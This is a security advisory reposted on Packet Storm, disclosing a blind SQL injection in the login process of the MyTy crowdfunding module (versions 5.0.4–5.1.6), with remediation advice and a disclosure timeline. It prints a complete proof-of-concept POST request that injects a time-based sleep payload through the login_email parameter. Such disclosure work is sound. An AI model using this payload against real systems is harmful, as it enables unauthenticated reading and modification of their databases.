exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MyTy 5.1.6 Blind SQL Injection

MyTy 5.1.6 Blind SQL Injection
Posted Nov 22, 2017
Authored by Nicolas Heiniger

MyTy versions 5.0.4 through 5.1.6 suffer from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | df077096933740cbc5dda72b5207f5cb81f1182b1fba66ba91e1268b7238d580

MyTy 5.1.6 Blind SQL Injection

Change Mirror Download
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: MyTy
# Vendor: Finlane GmbH
# CSNC ID: CSNC-2017-029
# CVE ID: -
# Subject: Blind SQL injection
# Risk: High
# Effect: Remotely exploitable
# Author: Nicolas Heiniger <nicolas.heiniger@compass-security.com>
# Date: 21.11.2017
#
#############################################################

Introduction:
-------------
MyTy[1] is a software framework that includes a crowdfunding module. It can be
installed on a customer server and used to create whitelabel websites for
crowdfunding platforms.

Compass Security discovered a web application security flaw in the crowdfunding
module login process that allows an unauthenticated attacker to execute
arbitrary SQL query against the database. This allows to read and modify the
whole database, within the privilege limitations of the database user executing
the queries.


Affected:
---------
Vulnerable:
* MyTy 5.0.4 to 5.1.6


Technical Description
---------------------
During the login process, the user email and password are sent in a POST
request. In this request, the login_email parameter is concatenated into an SQL
query in a way that allows for SQL injection.

This was first discovered as a time-based blind injection with the following
request:
===============
POST /tycon/modules/crowdfunding/mvc/controller/ajax/user/login/show.php?popin=1
&type=simpleLogin&activeTab=0 HTTP/1.1
Host: [CUT BY COMPASS]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: [CUT BY COMPASS]
Content-Length: 154
Cookie: tyFl=de_de; XSRF-TOKEN=oBwu%2BTWkisoYIpFEzoHDdSceUSflgjymh2uN1wXxZKg%3D;
lang=de; PHPSESSID=e1e71aroeb557v412tov9fu574; tyBl=en_us; cfce=1;
_ga=GA1.2.75537659.1504612703; _gid=GA1.2.1847726517.1504612703;
cf_cookie_policy_read=1; _gat=1
CSNC-HEN: Pentest1-Blue
Connection: close

login=1&callback=&redirect=&fwd=%252Fprojekte%252Fsuchergebnisse.html%253F
&login_type=inline&popin=1&type=simpleLogin
&login_email=test'%2b(select*from(select(sleep(20)))a)%2b'&login_password=1234
===============


Workaround / Fix:
-----------------
Install an up to date version of the MyTy software.

As a developer:
Strictly use prepared statements in order to protect the application from SQL
injection.

Optional addition:
Validate all user input and filter dangerous characters, which can cause a
change of the context and have to be filtered, cut or escaped e.g. " ' -- () ;


Timeline:
---------
2017-11-21: Coordinated public disclosure date
2017-09-06: Release of fix in versions 5.0.12 and 5.1.7
2017-09-06: Initial vendor response
2017-09-06: Initial vendor notification
2017-09-06: Discovery by Nicolas Heiniger


References:
-----------
[1] https://www.finlane.com/loesungen/whitelabel-pages/
[2] https://github.com/sqlmapproject/sqlmap
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close